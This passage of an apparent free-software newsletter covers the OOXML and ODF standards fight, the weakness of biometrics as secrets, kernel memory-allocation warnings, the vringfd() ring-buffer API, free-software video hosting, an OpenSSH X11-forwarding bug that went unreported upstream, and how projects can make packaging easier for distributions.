what will happen have sometimes been over the top as well.  Free software
is not about restricting choices—if folks want to store
documents in OOXML, that is their decision.


So, what will happen to ODF?  To many it looks like a truly vendor-neutral
standard—warts and all—will be shoved aside by a truly
vendor-specific one.  Andy Updegrove, who has followed this process closely
and fairly objectively in his weblog, sees
things a bit differently.  There is still a long way to go before OOXML
supplants ODF, if it ever does, according to Updegrove:

That answer is this:  if anyone had asked me to predict in August of 2005
(the date of the initial Massachusetts decision that set the ODF ball
rolling) how far ODF might go and what impact it might have, I would never
have guessed that it would have gone so far, and had such impact, in so
short a period of time.  I think it's safe to say that whatever happens
with the OOXML vote is likely to have little true impact at all on the
future success of ODF compliant products.  


It is possible that Microsoft is changing its ways, but longtime Microsoft
watchers, especially those who have been harmed by their tactics in the
past, remain skeptical.  One would guess Microsoft will be on its best
behavior for the next two months while objections to the approval can still
be raised.  After that, we will see—over time—whether this is
yet another lock-in play or whether they wish to play fair in the
document storage arena.  Every move they make will be closely scrutinized; there
are risks to reverting to their previous behaviors.  But, if we end up with a
truly open standard, free of patent nonsense, and implementable by all, it
doesn't really matter whether it is OOXML or ODF.  


		Biometrics for identification


Using a fingerprint or other physical characteristic, called biometric data, for
identity verification seems, at first glance, like a perfect solution to
the problem.  Unfortunately, there are some basic problems with using biometric
information that way.  If the biometric data can be gathered by others, it no
longer makes such a good identifier.


As part of a political protest against including fingerprints in passports,
the Chaos Computer Club (CCC)
published a
fingerprint of German Home Secretary Wolfgang Schäuble.  Schäuble
is a supporter of collecting fingerprint data to combat terrorism.  The club not
only published the picture, but also a film that can be placed over a
finger to deceive fingerprint scanners.  A club spokesman has usage
recommendations as reported in heise online: 

We recommend that you use the film whenever your fingerprint is taken,
such as when you enter the US, stop over at Heathrow, or even when you
touch bottles at your local super market -- just to be on the safe side

  It seems unlikely that CCC's distributed finger film will
actually leave the Secretary's print on a glass surface, but more
sophisticated versions of the same basic idea should be able to.
Various folks have shown that using an image of someone's fingerprint can
fool most scanners.  Even sophisticated scanners can be spoofed when that
image is placed over a live finger—with body temperature and pulse.
The problem is that while a fingerprint is unique, it isn't secret.  CCC
got theirs from a sympathizer who picked it up from a glass used by the Secretary
during a speech.


Bruce Schneier is, as usual, ahead of the curve on this.  In an article
from nearly ten years ago, he drives home the point:

The moral is that biometrics work great only if the verifier can verify two
things: one, that the biometric came from the person at the time of
verification, and two, that the biometric matches the master biometric on
file. If the system can't do that, it can't work. Biometrics are unique
identifiers, but they are not secrets. (Repeat that sentence until it sinks
in.) 


Other forms of biometric identification exist, but are susceptible to the
same kinds of problems.  A voiceprint or facial identification scanner
could be fairly easily subverted by secretly recording or photographing the
subject.  Retinal scans are trickier, perhaps, but technology to remotely
(and surreptitiously) read them will probably come along.  In many cases,
an attacker may not even need to go to that amount of trouble because they
can just extract—or pay to have someone else extract—that
information from some database.


More and more of this kind of information is being gathered and
centralized.  The US has started fingerprinting all ten fingers of non-citizens
who enter the country—other countries have started doing it in
retaliation.  One could hope the data retention policy for that information
is similar to that of White House emails, but it is probably longer.
Worse yet, it is probably stored with photographs, passport information,
and signature of the subject.


The key to using biometrics correctly is to repeat the Schneier mantra:

Biometrics are powerful and useful, but they are not keys. They are useful
in situations where there is a trusted path from the reader to the
verifier; in those cases all you need is a unique identifier. They are not
useful when you need the characteristics of a key: secrecy, randomness, the
ability to update or destroy. Biometrics are unique identifiers, but they
are not secrets. 


Revocation of a biometric identifier is difficult or impossible—if it
is even known to be compromised.  One could potentially switch fingers for
fingerprint identification, or even switch eyes—once.  Switching
voiceprint, face, or DNA, if and when that gets used, will be essentially
impossible.  Biometrics suffer from the same failure mode as using the same
password everywhere, unless you can somehow use a different characteristic
for each biometrically "protected" dataset—hard to do with limited
body parts.


Biometric data does have its uses, but it has limitations as well.  It
seems seductively simple that your fingerprint is the same as you, but it
isn't necessarily true.  Now we just need to teach the politicians, which
might be something that Schäuble is starting to learn.


		Memory allocation failures and scary warnings


People who put their Linux systems under a certain amount of memory stress
- and who look at their logfiles - may notice an occasional message
indicating that a "page allocation failure" has occurred,
followed by a scary backtrace.  These people may also notice that,
despite the apocalyptic appearance of this message, the world often fails
to end.  In fact, the system tends to carry on just fine.  For this reason,
Dave Jones, who probably gets ten emails for every backtrace generated on a
Fedora system, has suggested that these
messages are simply noise which should be removed.  Whether that should
really happen is not entirely clear, though; understanding why requires a
bit of background.


In general, the kernel's memory allocator does not like to fail.  So, when
kernel code requests memory, the memory management code will work hard to
satisfy the request.  If this work involves pushing other pages out to swap
or removing data from the page cache, so be it.  A big exception happens,
though, when an atomic allocation (using the GFP_ATOMIC flag) is
requested.  Code requesting atomic allocations is generally not in a
position where it can wait around for a lot of memory housecleaning work;
in particular, such code cannot sleep.  So if the memory manager is unable
to satisfy an atomic allocation with the memory it has in hand, it has no
choice except to fail the request.


Such failures are quite rare, especially when single pages are
requested.  The kernel works to keep some spare pages around at all times,
so the memory stress must be severe before a single-page allocation will
fail.  Multi-page allocations are harder, though; the kernel's memory
management code tends to fragment pages, making groups of
physically-contiguous pages hard to find.  In particular, if the system is
under pressure to the point that there is not much free memory available at
all, the chances of successfully allocating two (or more) contiguous pages
drop considerably.


Multi-page allocations are not often used in the kernel; they are avoided
whenever possible.  There are situations where they are necessary,
though.  One example is network drivers which (1) support the
transmission and reception of packets too large to fit into a single page,
and which (2) drive hardware which cannot perform scatter/gather I/O
on a single packet.  In this situation, the DMA buffers used for packets
must be larger than one page, and they must be physically contiguous.  This
is a situation which will become less 
pressing over time; scatter/gather capability in the hardware is
increasingly common, and drivers are being rewritten to make use of this
capability.  With sufficiently smart hardware, the need for multi-page
allocations goes down considerably.


But all of that skirts around the main point, which is that kernel code is
supposed to handle allocation failures properly.  There is never any
guarantee that memory will be available, so kernel code must be written
defensively.  Allocation failures must be handled without losing any
more capability than is strictly necessary.  If one assumes that kernel
code is written correctly, there should be no need to issue warnings on
allocation failures.  Things should just continue to work, perhaps without
users noticing at all.


And, in fact, things often do just work.  But the discussion resulting from
Dave's suggestion makes it clear that few developers are confident that all
kernel code does the right thing in the face of memory allocation
problems.  In cases where an allocation failure is not dealt with
correctly, the system may go down in random places, leaving few clues as to
what really happened.  In that kind of situation, the allocation failure
warning may be the only useful information which survives the crash.  For
this reason, some people want to see the warnings left in place.


As it happens, the memory allocator supports a special bit
(__GFP_NOWARN) which causes the warning not to be emitted if a
specific allocation fails.  So it has been suggested that the allocations
made from code which is known to handle failures properly have __GFP_NOWARN
set.  That would kill the warnings in code known to do the right thing
while leaving them in place for all other callers, presumably limiting the warnings to
places where there might truly be a problem.  Jeff Garzik strongly opposed this idea, though, saying
that it clutters up the code and "punishes good behavior."


The other reason given for keeping the warnings in place is to make it
clear when a system is running under persistent memory pressure.  Such
systems will not be performing optimally; often there are changes which can
be made to relieve the pressure and help the system to run more smoothly.
So it has been suggested that the warning could be reduced in frequency and
made less scary.  Nick Piggin suggests:


	So I think that the messages should stay, and they should print out
	some header to say that it is only a warning and if not happening
	too often then it is not a problem, and if it is continually
	happening then please try X or Y or post a message to lkml...


An alternative idea would be to keep some sort of counter somewhere which
could be queried by curious system administrators.

Of course, the real solution is to ensure that all kernel code is
robust in the face of allocation failures.  This can be hard to do, since
the error recovery paths in any code are not often exercised or tested.
Fortunately, the fault injection
framework can help in this situation.  Kernel developers can use this
framework to simulate allocation failures in specific regions of code, then
watch to see what happens.  Your editor's impression, though, is that
relatively few developers are using this tool.  So confidence in the
kernel's handling of allocation failures may remain low, and the desire to
keep the warning around may remain high.

		vringfd()


One of the core features of the (now stalled) kevent subsystem was a
circular buffer intended for efficient movement of data between the kernel
and user space.  Kevent may have run out of steam, but the ring buffer idea
is back via a different path.  Rusty Russell is now proposing a new system call
(called vringfd()) which turns some of the virtio work into a new
kernel-to-user ring buffer interface.  The submitted patch is breathtaking
in its lack of documentation on this new system call, especially
considering that its author is quite good with that sort of writing.

Your editor has
taken this omission as a personal challenge and, as a result, has set about
reverse engineering the (somewhat complex) vringfd() interface.


A user-space process which wishes to set up a vring for communication with
the kernel must create a slightly complicated data structure first.  One
starts by deciding how many entries the ring should have; this number must
be a power of two which fits into an unsigned, 16-bit value.  Given this
number (we'll call it RING_SIZE), the data structure looks like
this:


The page alignment for the used array is important - that array
might be mapped separately into kernel space.  The array must fit into a
single page, which puts a practical limit of 256 entries for
RING_SIZE on systems with 4096-byte pages.  If this API goes
forward, chances are good that a way will be found to raise this limit.

Individual descriptors in the ring are described with this structure:


For a simple buffer, the application would simply point addr at
the beginning and set len to the appropriate value.  If the buffer
is to be written to by the kernel, the application should also set
VRING_DESC_F_WRITE in the flags field.

Things can get more complicated than that, though, in that the
vringfd() interface supports multipart scatter/gather buffers.  To
set up such a buffer, user space would use one vring_desc entry
for each segment of the buffer.  For all but the final segment, the
VRING_DESC_F_NEXT flag (saying "use the next descriptor too")
should be set, and next should be the index of the next
descriptor.  When the kernel grabs a buffer, it will follow the chain and
use all segments found until the final one (which lacks the
VRING_DESC_F_NEXT flag) is encountered.

Before the kernel will use buffers set up by the application, though, user
space must indicate that the buffer is ready.  That is done through the
vring_avail structure:


The ring array holds indexes into the descriptors array.
The idx field should always be the index of the last valid entry
in ring.  When a new buffer is ready for transfer to or from the
kernel, the application will store the index of the first descriptor into
ring[idx+1], then increment idx.  When the ring is first
established, the kernel remembers the position of idx, so the
first buffer should be added here after the vringfd()
system call is made.

The kernel will consume buffers from the available ring as
needed.  Once the requested operation has been performed on the buffer and
the kernel is done with it, the buffer will show up in the used
area, which is structured this way:


In the vring_used structure, idx is the index of the next
entry in ring which may be written by the kernel; it will be
incremented after the ring is updated.  When a buffer is placed in the used
ring, the id field will be the index of the descriptor, and
len will be the actual length of the data transferred.

Note that the flags fields in the vring_avail and
vring_used structures appear to be unused.


Once the application has this whole data structure set up, it can establish
the ring buffer with the kernel with the new system call:


Here, addr is the base address of the data structure described
above, ring_size is the number of descriptors in the ring, and
last_used is a 16-bit unsigned integer indicating which entry in
the used ring was last consumed by the application.  Failure to
keep last_used current will not slow things down, but it will keep
poll() from working properly.

The return value will be a file descriptor associated with the ring.

Creating the vring is only part of the job, though.  The next step is to
connect it with a kernel subsystem for the transfer of data.  Rusty's patch
includes vring support in the tun virtual network driver; to use that
support, an application makes a special ioctl() call to provide
the vring file descriptor to the tun driver.  Any other subsystem will need
a similar mechanism to support vring.

If the application is using the ring to transfer data into the kernel, it
must (1) set up one or more descriptors for full data buffers in the
available ring, then (2) make a write() call to the
vring file descriptor.  The buffer and length passed to write()
are ignored; all that matters is that a write was done to that file
descriptor.  When write() returns, the operation will have been set
in motion, but it cannot be considered to be complete until the ring
descriptors show up in the used ring.

For data transfers from the kernel to user space, the application simply
puts buffers into the available ring, then waits until they show
up in the used ring.  A poll() on the vring file
descriptor will block until buffers are available.  The kernel determines
whether unconsumed buffers exist in used by comparing the 
vring_used-&gt;idx index against the application-supplied
last_used value.  It's worth noting that, depending on how the
relevant kernel subsystem works, buffers may not actually make it into the
used ring until the poll() call is made.
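
The comparison of the two indexes can be modelled in a few lines. The following is only a user-space sketch in Python, not the kernel's code: the helper names are invented for illustration, and it assumes (as in the related virtio ring layout) that idx and last_used are free-running 16-bit counters and that the ring size is a power of two.

```python
RING_MASK = 0xFFFF  # assumption: idx and last_used are 16-bit unsigned counters


def pending_used(used_idx, last_used):
    """Count used-ring entries the application has not yet consumed."""
    # Masking makes the subtraction behave like unsigned 16-bit arithmetic,
    # so the result stays correct when the counters wrap past 65535.
    return (used_idx - last_used) & RING_MASK


def consume_used(used_ring, used_idx, last_used):
    """Collect every unconsumed (id, len) pair and return the new last_used."""
    entries = []
    while pending_used(used_idx, last_used) != 0:
        # Assumption: the slot is the counter modulo the (power-of-two) ring size.
        entries.append(used_ring[last_used % len(used_ring)])
        last_used = (last_used + 1) & RING_MASK
    return entries, last_used
```

An application that forgets to advance last_used would, in this model, always see a nonzero pending count, which matches the observation that poll() stops being useful when the value is stale.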


On the kernel side, a developer wanting to add vring support to a subsystem
will start by creating a set of vring_ops:


All of these functions take a private pointer given when the subsystem
attaches to the vring (to be described shortly).  The pull()
callback is invoked when the application calls poll(); if there is
any descriptor processing which must be done with user space accessible,
this is the place to do it.  If pull() adds any buffers to the
used ring, it should return the number of buffers; it can also
return a negative error code.  push() is called from a
write() call indicating that there are buffers ready to be
transferred into the kernel; it returns zero or a negative error code.  The
destroy() callback is called when the vring file descriptor is
closed.  All of these callbacks are optional.

Attaching to a vring is done with:


For this call, fd is a file descriptor corresponding to a vring,
ops is the operations structure described above, data is
a private data pointer which is passed into the vring_ops
callbacks, and atomic_use is nonzero if the kernel needs to be
able to add buffers to the used ring in atomic context.  The
return value is a pointer to an internal vring data structure or an
ERR_PTR() value if something goes wrong.

To obtain a buffer from the available ring, a call is made to:


This function will fill in an array of iovec structures
corresponding to the next available buffer.  If the kernel expects to write
to the buffer, it should set in_iov to the iovec array,
num_in pointing to the length of in_iov, and
in_len pointing to a location to store the total length of the
buffer (or NULL if that information is not useful).  For transfers
into the kernel, out_iov, num_out, and out_len
should be set similarly.  Note that the addresses stored in the
iovec arrays are user-space addresses; vring_get_buffer()
does not validate them, so the caller must do so.


It is possible to pass both in_iov
and out_iov; in this case, one of the two will be set, depending
on whether the next buffer in the available ring has the
VRING_DESC_F_WRITE flag set.  In most cases, though, only one of
the two sets of parameters will have non-NULL values.  The
apparent intent of the API is that, if bidirectional transfers between
user space and the kernel are needed, two separate vrings should be used.

The return value from vring_get_buffer() will be one of (1) a
positive descriptor index, (2) zero, indicating that no buffers are
available, or (3) a negative error code.  


The descriptor index should be saved for the final step, which is indicating
that the kernel is done with a specific buffer:


Either one of these functions indicates that the buffer indicated by
id should be put into the used ring; len is the
amount of data actually transferred.  If sleeping is not possible,
vring_used_buffer_atomic() should be used - but the vring must
have been attached with the atomic_use flag set.

There does not appear to be a way for a subsystem to detach from a vring;
it must, instead, wait for the application to close the associated file
descriptor.


This interface is in an early stage, and the code has a number of
limitations and FIXME comments.  So things seem likely to evolve before
vringfd() is seriously considered for merging into the mainline
kernel.  The idea of a ring buffer for this kind of communication seems to
come around on a regular basis, though, so it would seem that there is a
demand for this kind of API.

		Video forums for free software


Over the last few years, we have seen the rise of video content on the web,
but much of that content has been locked up in non-free formats.  Patented
video codecs are a big part of the problem; there are free
alternatives (Theora and Dirac, for example), but they are not
widely used.  Free software projects often use videos as part of their
marketing and documentation, using screencasts, for example, to highlight interesting or exciting features
of the program.  But the choices for collecting and distributing
video content leave much to be desired for free software advocates.


The Fedora project has been looking into this problem lately, in support of
its FedoraTV project.  A recent thread on the fedora-advisory-board
mailing list looks at various alternatives now that the original host
of FedoraTV content, luluTV, has gone out
of business.  Greg DeKoenigsberg outlines the problem:

The original goal of Fedora TV was to provide a "Fedora-friendly" home for
videos that we had some control over.  I think this is still a worthwhile
strategic goal, but since we no longer have the help of dedicated
engineers, I no longer think it's a sensible tactical goal.

The question that follows: "we've got lots of people who are excited about
making Fedora videos.  What's the best way, in the short term, to gather
those videos together to make them accessible?"


He goes on to outline the criteria for finding a near-term solution,
starting with the absolute requirements: Ogg Theora format, one-click
download, and a robust, stable hosting site.  Also important, but not as
critical, are things like the ability to extract static screenshots for
posting in various places, an easy way for community members to know when
new videos are available (an RSS feed for example), and a way for uploaders
to easily associate a license with their video.  These should resonate with
most projects that have an interest in providing a video forum for their
community as they are likely to have many of the same needs.


Transcoding the videos to Flash to reach the largest possible audience is
DeKoenigsberg's "controversial" criterion.  It is an
unfortunate truth that, even for fairly strong free software proponents, the
Flash browser plugin provides the simplest route to viewing online videos.
Other solutions exist and work, but require a great deal more effort to
enable additional software repositories so that the proprietary or patented
codecs can be installed.  Interestingly, there were no arguments presented
against the transcoding suggestion.


For Fedora, where Theora—or other free codec—viewers are easily available, Flash transcoding
might be less of a requirement.  Other projects, especially those that are
cross-platform, may find that a large part of their community is either
unable or unwilling to install additional software to view videos.  Users
of non-free operating systems are largely unaware of the video codec
problems; their OS comes with a no-extra-cost video viewer that just
works. Because of that, transcoding to Flash does at least provide a way to
present videos that can be relatively easily viewed by free and non-free
systems alike.


Various solutions to the hosting problem were discussed, from partnering
with archive.org to rolling their own
using MediaWiki, Plumi, or some of the technology released
by luluTV.  One of the suggestions that got the most attention was to
create a Miro channel hosted, at
least temporarily, on Fedora project servers.  Miro has a lot of promise as
a viewer and organizer of videos, with a BitTorrent client built in, but it
doesn't solve the other half of the problem: how to allow the community
to contribute.


There is, it seems, a growing need for a free community video forum, both
from a code and a hosting perspective.  The bandwidth and storage requirements of video
are enormous, so covering the actual cost will be a big challenge.  Places like YouTube allow short videos to be uploaded, but
they can only be played back via Flash.  In addition, their software is not
free, so they only solve parts of the problem.


There are no obvious free
solutions, yet, but it is a problem that we will be facing more frequently.  
Somehow leveraging Miro as a free, cross-platform video delivery system may
make the most sense.  Providing a way for the community to upload video
content into the channels would make for a mostly working FedoraTV and
other projects like that.  Miro supports
free codecs as well, which might help to start weaning people away from their
current non-free codec addiction.  Then we can start figuring out how to
pay for the network and hard disk capacity required.


		OpenSSH bug falls through the cracks


Linux distributions often patch the software they distribute, to fix bugs
or add features.  Anything they add is pushed upstream to the project
responsible for the package—at least in theory.  When that theory is
not borne out in practice, it can lead to the kind of unhappiness and
finger pointing that went along with a recent OpenSSH release.  The
release notes point at Debian for failing to report a security bug upstream, but that bug was actually fixed much earlier, in Red Hat Enterprise Linux 4 (RHEL4).


The bug in question is rather nasty, allowing a local attacker to hijack X
Windows programs of a user who logged in using ssh with X forwarding
enabled.  Under those 
circumstances, the ssh client and server arrange that any X programs started on the
logged-in machine actually display on the client machine's desktop.  This
is very useful for running X programs across the internet as the X
traffic is encrypted as part of the ssh session. 


Due to a broken interaction with Internet Protocol version 6
(IPv6)—the next generation protocol for internet traffic—ssh
can 
get confused about the port number of the X server.  If a particular port
(which maps to the X DISPLAY environment variable) is not available to be
used under IPv4—the protocol in use today—but is available under
IPv6, the ssh server will incorrectly set DISPLAY.  If it is an attacker's
program that is listening on the IPv4 port, it will be able to hijack X
programs that get run.


Up until sometime in the last several years, this would not have happened for most Linux
boxes because IPv6 was generally not enabled.  In that case, the ssh server
would recognize that it could not get the port it wanted and try another,
eventually setting DISPLAY correctly.  Because IPv6 is much newer, these
kinds of bugs may exist in other network programs.  This bug should serve
as a reminder to developers to closely check their IPv6 support. 
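
The safe behavior described above, moving on to another port unless the wanted one is free everywhere, can be sketched as follows. This is a simplified Python model rather than OpenSSH's actual code: choose_display() and the can_bind callback are hypothetical names, display N is assumed to map to TCP port 6000 + N, and the search starts at display 10 on the assumption that the server uses sshd's default display offset.

```python
X11_BASE_PORT = 6000  # assumption: display N listens on TCP port 6000 + N


def choose_display(can_bind, families=("ipv4", "ipv6"), first=10, last=1000):
    """Return the first display whose port is free in every address family.

    can_bind(family, port) is a caller-supplied (hypothetical) predicate
    that reports whether the server could bind that port for that family.
    """
    for display in range(first, last):
        port = X11_BASE_PORT + display
        # Accept the display only if *all* families bind; accepting it when
        # just one family binds is what leaves room for a hijacker.
        if all(can_bind(family, port) for family in families):
            return display
    return None  # no usable display found
```

With an attacker already listening on IPv4 port 6010, a check that consults only IPv6 would still pick display 10, while the all-families check above moves on to display 11.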


Clearly, though, the bug fell through the cracks.  The OpenSSH team shows
its annoyance in the release notes:

We apologise for any inconvenience resulting from this release
being made so shortly after 4.9. Unfortunately we only learned of
the below security issue from the public CVE report. The Debian
OpenSSH maintainers responsible for handling the initial report of
this bug failed to report it via either the private OpenSSH security
contact list (openssh@openssh.com) or the portable OpenSSH Bugzilla
(http://bugzilla.mindrot.org/).


It was reported
in January to the Debian bug tracking system, but not fixed and released
until late March.  OpenSSH does releases every six months or so, with 4.9
being released on March 30.  Having to turn around another release four days
later to fix a problem that was known for a few months could certainly make
for annoyed developers.  So how did the bug get fixed in Debian, with a
Common
Vulnerabilities and Exposures (CVE) number being assigned, but without
notifying the OpenSSH team?


The Debian bug entry is instructive, because it documents some of the
steps that led to the hurried release.  In particular, Phil Miller
thought he had done the right thing to report the problem in February:

As noted in the control section, I have forwarded this to Theo
DeRaadt, the point of contact for security issues found in OpenBSD's
software.


That email must have gotten lost or been eaten by a spam filter, as de Raadt would presumably have gotten it to the right
people had he seen it.  The bug description clearly puts it in the realm of
a security problem, but the bug was not classified that way in the Debian
system.  Had it been, it would have been handled differently, possibly
triggering an email to the proper place.  But the bug report also shows
that Red Hat fixed it in 2005.


It was reported to Red Hat by a customer and got entered into their bugzilla
as bug
#163732.  Unfortunately, that bug report is confidential because it
contains potentially sensitive
customer information.  This makes it difficult to track further.
Indications are that it was not seen as a security problem and that it was
believed to have been already known as an OpenSSH bug.  Apparently no one
checked to make sure the OpenSSH folks knew of it though.


Closer cooperation between the OpenSSH maintainers for Red Hat and the
upstream team would probably have helped.  Red Hat has been carrying the patch
along for quite some time.  Because the security implications were not
clear and the patch is quite simple, it may not have seemed to be all that
necessary to get it upstream.  There are, though, more than twenty patches listed in
the Fedora OpenSSH CVS repository for rawhide, which will become Fedora 9.


The OpenSSH team would be well served by paying closer attention to various
distribution patches to their code as well.  It is certainly plausible that
those interested in finding security holes to exploit might start by seeing
if any patches floating around for critical services like OpenSSH were
useful.  By being more proactive, OpenSSH might have found and fixed this
bug much earlier.  The way this particular bug avoided notice seems to be
mostly happenstance; if there is blame to be placed, there is plenty to go
around. 


RHEL and other "enterprise" distributions have long support cycles, which
means that the versions of various packages being maintained are well behind the upstream
project.  It doesn't take very many bug reports getting shot down because
they have already been fixed in a more recent version before distribution
maintainers lose enthusiasm for making those reports.  But it is an
essential part of the process.  The OpenSSH team has the reputation of
being somewhat difficult to work with, which may have helped this
particular problem get overlooked.


It is a difficult problem to solve fully.  Distributions have their own
set of requirements which may be in opposition to those of the upstream
project.  Those projects may also have policies and procedures that
distributions are not up to speed on.  The Linux kernel often sees the same
kind of conflicts, which is why distributions often maintain their own set
of kernel patches for features their customers need.  But it is in
everyone's best interest to work those problems out so that distributions
carry along as few patches as possible while upstream projects do not miss
out on bug fixes and features.


		Distribution-friendly projects Part 2


[Editor's note: This article, which looks at the interactions of software projects and distribution providers, is presented in three parts.  Part 1 introduces the concepts found here, in part 2.]

Technical needs

Under the name technical needs we're going to see a series of
requests that distributors often have to make to the original
developers of the software they want to package. Not all these requests
are made by all distributors. Some will care more about one particular
aspect than another.  Some might apply only on non-mainstream
distributions, and some distributions might just want to take care of
philosophical needs and leave the technical side entirely alone, though
such distributions aren't exactly common.

Most of the technical needs described in this article are present in
the policies set forth by Debian (written), Gentoo (mostly unwritten), and
apply to other distributions as well. Some of these needs won't be encoded
in any policy and are often not requested explicitly by the developers.
Those are mostly details that make a distributor's life easier.  These
details may not be mandatory, but it's still worth considering them.  The
easier the life of the downstream maintainer is, the easier it is
for the software to be packaged.

Also, it's important to note that when a distribution makes a request,
it might not be alone. Other distributions might want to take
advantage of the same change, but they didn't have time to request it,
or simply preferred to wait before packaging the software until some
issues were resolved. Don't just ignore the request because the
distribution which contacted you already took care of the issue by
patching your software.  Acknowledge the request and apply the patch;
it will make both your life and theirs easier in the long term.

Sane version information

Distributions often rely on the
version information provided by the original software developers. This
usually means that they don't expect huge changes between version
$x.y.z$ and version $x.y.z+1$.

One very common scheme for versions is the major, minor,
micro version, which in the example above would be respectively
$x$, $y$ and $z$ (it's a common misconception that $y$ is the
major version component).

The way this kind of scheme is usually applied relates to the
compatibility of the programming interface (API and ABI). Changes in the
software warrant increments of various version components depending on the
amount of changes in the interfaces:

 adding zero or more interfaces, without changing or removing
  previous interfaces, or the behaviour expected from them - meaning
  the software is entirely compatible with the older version - usually
  only requires an increment of the micro version;
 changing or removing interfaces, usually deprecated ones - in such a
  way that older software might need to be adapted, but not
  rewritten - usually requires an increment of the minor version;
 changing the interface entirely - requiring users of the
  software to rewrite their code, or otherwise make major structural
  changes - usually requires an increment of the major version.


Obviously, increasing one component will usually involve resetting to
zero the version components on the right.
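
As a small illustration of the rule, here is a sketch in Python; the bump() helper is invented for this example and handles only plain three-component versions, with no suffix or nano component.

```python
def bump(version, component):
    """Increment one component of a 'major.minor.micro' version string.

    Components to the right of the incremented one are reset to zero.
    """
    major, minor, micro = (int(part) for part in version.split("."))
    if component == "major":
        return f"{major + 1}.0.0"
    if component == "minor":
        return f"{major}.{minor + 1}.0"
    if component == "micro":
        return f"{major}.{minor}.{micro + 1}"
    raise ValueError(f"unknown version component: {component!r}")
```

So an incompatible interface change to version 1.3.4 would yield bump("1.3.4", "major"), that is, 2.0.0, while a purely compatible addition would yield 1.3.5.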

There might be other components, too. For instance, if the source
archive has to be regenerated without any code change (missing file,
updated addresses for the maintainers or the homepages), rather than
changing the version entirely, a suffix might just be added at the end
of the version, making it, for instance, $1.2.3a$ or $1.2.3c$. If just
a security issue has been fixed, it could also be expressed by adding
a nano component to the version, like $1.3.34.1$, to
emphasize that there is no change other than the security fix.

The source archives for the software should be named after both the
project and the version, resulting in names like
foobar-1.3.4.tar.gz.  Having different versions of the same
software that don't have the same naming causes confusion.

It is quite important for the distributions that source archives not be
changed without changing the name: distributions usually make sure that
the checksum (usually MD5, but often nowadays SHA1) of the archive is
the one they recorded, and changing the tarball without notice often
leads to failed builds.
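
To make the failure mode concrete, the check a distribution performs might look roughly like the following Python sketch. The function names are hypothetical and no particular distribution's tooling is being reproduced; the point is only that any change to the tarball's bytes changes the digest and so fails the comparison.

```python
import hashlib


def digest_chunks(chunks, algorithm="sha1"):
    """Hash an iterable of byte strings and return the hex digest."""
    digest = hashlib.new(algorithm)
    for chunk in chunks:
        digest.update(chunk)
    return digest.hexdigest()


def archive_digest(path, algorithm="sha1", chunk_size=65536):
    """Hash a source archive on disk without loading it all into memory."""
    with open(path, "rb") as archive:
        return digest_chunks(iter(lambda: archive.read(chunk_size), b""), algorithm)


def archive_matches(path, recorded_digest, algorithm="sha1"):
    """Return True only if the archive still has the recorded checksum."""
    return archive_digest(path, algorithm) == recorded_digest.lower()
```

A silently re-rolled foobar-1.3.4.tar.gz would make archive_matches() return False on every system that recorded the old digest, which is why a new name (or suffix) is the friendlier choice.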

There is a similar issue with the naming of the directory inside the
archive. Most distributions assume that the source is included inside
a directory with the same name as the archive (minus the extension),
but often enough the archive contains sources not organised in a
directory, or a directory with the name of the project without the
version. Similarly, if possible, the directory name should also include
any suffixes, so that distributions need not add special cases for them.

Distribution methods like Ruby Gems and Python Eggs mandate similar
version schemes for their packages for the same reason Free Software
distributions would prefer them: it makes it easier to compare versions,
and to know when something has to be updated.
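
A regular scheme is what makes mechanical comparison possible. The sketch below, in Python, uses an invented version_key() helper and assumes versions consist of dot-separated numbers with at most one trailing lowercase letter, as in the examples above; real package managers use more elaborate rules.

```python
import re


def version_key(version):
    """Turn a version such as '1.2.3a' into a key that sorts correctly."""
    match = re.fullmatch(r"(\d+(?:\.\d+)*)([a-z]?)", version)
    if match is None:
        raise ValueError(f"unsupported version string: {version!r}")
    numbers, suffix = match.groups()
    # Comparing integers (not strings) keeps 1.10 newer than 1.9; the
    # optional letter suffix only breaks ties between equal numbers.
    return tuple(int(part) for part in numbers.split(".")), suffix
```

With such a key, an update check reduces to version_key(available) > version_key(installed); a project that jumps between unrelated naming styles gives a packager nothing comparable to work with.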

Internal libraries

One common issue considered by both Debian and
Gentoo policies relates to the use of internal copies of
libraries. Sometimes the software needs some uncommon libraries to
work properly. These libraries are unlikely to be found on users'
systems, which would require them to download and install them
separately.  Such a task is not easy for new users. A few projects will
keep an internal copy of the libraries they want to use for that reason,
and will use that internal copy unconditionally.

Adding an internal copy of a library seems cheap to the original
developers, and it's convenient for users to download and install a single
package; however, this causes a large number of problems for
distributors. The first problem is that they might have to patch the same
bug several times.  Consider zlib as a practical
example: a very common library implementing the classic deflate
compression algorithm.  It's a very small library that a lot of projects imported
internally over the years. Not too long ago, a serious security issue was
found in the code of zlib, and all the distributors had to patch
it out as fast as they could. In a perfect world, patching zlib
and, where necessary, rebuilding everything that linked to it would have sufficed.
Unfortunately, we're not in a perfect world.  Many programs were packaged
with internal copies of the library, requiring each of those packages to be
patched to make sure the issue was solved.


There are many other implications of using internal bundled copies
of libraries, and most of them are critical for distributors. These
problems become more complex when the internal copies of
libraries are modified to better suit the use the application has for
them. In those cases, even though the source might be advertised as
being part of another library, it is actually different from that
library, and its replacement might be impossible, or may cause
further problems.


 The code is no longer shared between programs: not only
  the source code, which requires extra work to fix bugs and security
  issues, but also executable code and data. When shared libraries are
  used, the memory used by processes loading them is reduced, as they
  will share code and part of the data. This cannot be done when using
  static libraries or, worse, internal copies of libraries.
 Symbols may collide during the loading: modern Linux
  and Unix systems use the ELF format for programs and libraries. This
  format provides a so-called flat namespace for the symbols
  (data and functions) to be found. When using internal copies of
  other libraries in a library, the two definitions of the same symbol
  might collide, and just one of them can be used. If the interface
  used by the library changed subtly, it is possible that this will
  lead the program in an execution path that was not intended and is
  not safe.
 Distribution-specific changes need to be duplicated: as
  will be discussed later on, sometimes distributions need to make
  changes to source code, to fix bugs (security related and not), or
  change paths of files for instance. Internal copies require
  downstream maintainers to repeat these changes multiple times.

For this reason, a good compromise between the needs of the original
authors and the needs of the distributions is to treat internal copies of
libraries as untouchable, thus disallowing any changes in their
interface or behaviour.  That way those users who get the package directly
from upstream still have only one package to download and build.  The
distributions, which want to share code as much as possible, should have a
way to ask the build system to use the system copy of that library. An easy
way to implement that is to provide --with-system-libfoo
options at the ./configure call (for autoconf for
instance), or to give a WITH_SYSTEM_LIBFOO handle at the
make command line.

By allowing the distributions to use their own copies of libraries,
the developers are still preserving the ability for the user not to
install extra dependencies, but also giving the distributions the
power they need, to avoid changing the original code, sometimes in a
conflicting way. It is important for the upstream authors to not change the
behaviour of bundled libraries, as the distributions will most likely want
to use a shared system library instead.  Modifications made to a bundled
library will likely cause problems for users who get the package from
